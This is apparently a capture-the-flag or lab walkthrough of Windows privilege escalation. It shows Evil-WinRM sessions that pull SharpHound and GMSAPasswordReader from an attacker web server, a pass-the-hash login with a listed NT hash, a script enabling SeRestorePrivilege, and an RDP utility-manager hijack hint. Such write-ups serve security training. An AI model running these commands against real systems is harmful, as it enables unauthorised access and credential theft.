Priv Esc

*Evil-WinRM* PS C:\Users\enox> ls Desktop


    Directory: C:\Users\enox\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/20/2021   4:12 AM                application
-a----        8/29/2024   3:31 AM             34 local.txt
-a----        5/27/2021   7:03 AM            239 todo.txt

$ python -m http.server 80                                                                                                                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

*Evil-WinRM* PS C:\programdata> curl 192.168.45.233/SharpHound.exe -o SharpHound.exe

*Evil-WinRM* PS C:\programdata> .\SharpHound.exe -c all

*Evil-WinRM* PS C:\programdata> download 20240829042420_BloodHound.zip

Toolies/GMSAPasswordReader.exe at master · expl0itabl3/TooliesGitHub

*Evil-WinRM* PS C:\programdata> curl 192.168.45.233/GMSAPasswordReader.exe -o GMSAPasswordReader.exe

$ evil-winrm -u 'svc_apache$' -H 4FC1682833B24CF2225248D67DF7E618 -i 192.168.241.165

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeRestorePrivilege

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> ls


    Directory: C:\Users\svc_apache$\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2021   8:27 AM           3213 EnableSeRestorePrivilege.ps1

GitHub - gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.GitHub

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> . .\EnableSeRestorePrivilege.ps1
Debug:
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	[StructLayout(LayoutKind.Sequential, Pack = 1)]
	public struct TokPriv1Luid
	{
		public int Count;
		public long Luid;
		public int Attr;
	}

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle,
			int DesiredAccess,
			ref IntPtr TokenHandle);

		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool LookupPrivilegeValue(
			string lpSystemName,
			string lpName,
			ref long lpLuid);

		[DllImport("advapi32.dll", SetLastError = true)]
		public static extern bool AdjustTokenPrivileges(
			IntPtr TokenHandle,
			bool DisableAllPrivileges,
			ref TokPriv1Luid NewState,
			int BufferLength,
			IntPtr PreviousState,
			IntPtr ReturnLength);

	}

	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	}
Debug: Current process handle: 2696
Debug: Calling OpenProcessToken()
Debug: Token handle: 0
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 6

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> Enable-SeRestorePrivilege
Debug: Current process handle: 3148
Debug: Calling OpenProcessToken()
Debug: Token handle: 3160
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0

$ rdesktop  192.168.241.165

Hit Win + U

192.168.241.165

PreviousEnumeration NextPriv Esc Unintended Route

Last updated 1 year ago